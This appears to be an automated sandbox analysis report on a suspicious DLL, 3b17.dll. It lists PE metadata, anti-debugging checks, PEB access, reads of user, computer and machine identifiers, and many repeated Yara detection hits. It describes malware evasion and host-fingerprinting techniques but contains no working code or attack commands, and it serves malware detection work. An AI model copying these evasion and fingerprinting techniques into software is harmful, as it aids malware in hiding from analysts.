Window detected: More than 3 window changes detected |
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe |
File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll |
Jump to behavior |
Source: 3b17.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: 3b17.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: 3b17.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: 3b17.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: 3b17.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: 3b17.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: 3b17.dll |
Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: 3b17.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: |
Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3b17.dll |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E191F7C LoadLibraryA,GetProcAddress, |
0_2_6E191F7C |
Source: 3b17.dll |
Static PE information: real checksum: 0xa34b8 should be: 0x9effb |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E192200 push ecx; ret |
0_2_6E192209 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E192253 push ecx; ret |
0_2_6E192263 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E217583 push ecx; ret |
0_2_6E217596 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E87A60 push ecx; ret |
3_2_00E87A69 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E87DCF push ecx; ret |
3_2_00E87DDF |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E217583 push ecx; ret |
3_2_6E217596 |
Source: Yara match |
File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe |
Registry key monitored for changes: HKEY_CURRENT_USER_Classes |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Last function: Thread delayed |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_6E1DE78D |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E191F7C LoadLibraryA,GetProcAddress, |
0_2_6E191F7C |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E20227F mov eax, dword ptr fs:[00000030h] |
0_2_6E20227F |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1F2120 mov eax, dword ptr fs:[00000030h] |
0_2_6E1F2120 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E21E801 mov eax, dword ptr fs:[00000030h] |
0_2_6E21E801 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E21E730 mov eax, dword ptr fs:[00000030h] |
0_2_6E21E730 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E21E337 push dword ptr fs:[00000030h] |
0_2_6E21E337 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E20227F mov eax, dword ptr fs:[00000030h] |
3_2_6E20227F |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F2120 mov eax, dword ptr fs:[00000030h] |
3_2_6E1F2120 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E21E801 mov eax, dword ptr fs:[00000030h] |
3_2_6E21E801 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E21E730 mov eax, dword ptr fs:[00000030h] |
3_2_6E21E730 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E21E337 push dword ptr fs:[00000030h] |
3_2_6E21E337 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_6E1DE78D |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1DDFF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_6E1DDFF3 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1F18EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_6E1F18EF |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
3_2_6E1DE78D |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1DDFF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
3_2_6E1DDFF3 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F18EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
3_2_6E1F18EF |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1 |
Jump to behavior |
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp |
Binary or memory string: Program Manager |
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp |
Binary or memory string: Shell_TrayWnd |
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp |
Binary or memory string: Progman |
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp |
Binary or memory string: Progmanlock |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1DEBB6 cpuid |
0_2_6E1DEBB6 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, |
0_2_6E191E8A |
Source: C:\Windows\System32\loaddll32.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E191144 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, |
0_2_6E191144 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E84454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, |
3_2_00E84454 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E201C7E _free,GetTimeZoneInformation,_free, |
0_2_6E201C7E |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E191F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, |
0_2_6E191F10 |
Source: C:\Windows\System32\loaddll32.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Jump to behavior |
Source: Yara match |
File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY |
Source: Yara match |
File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY |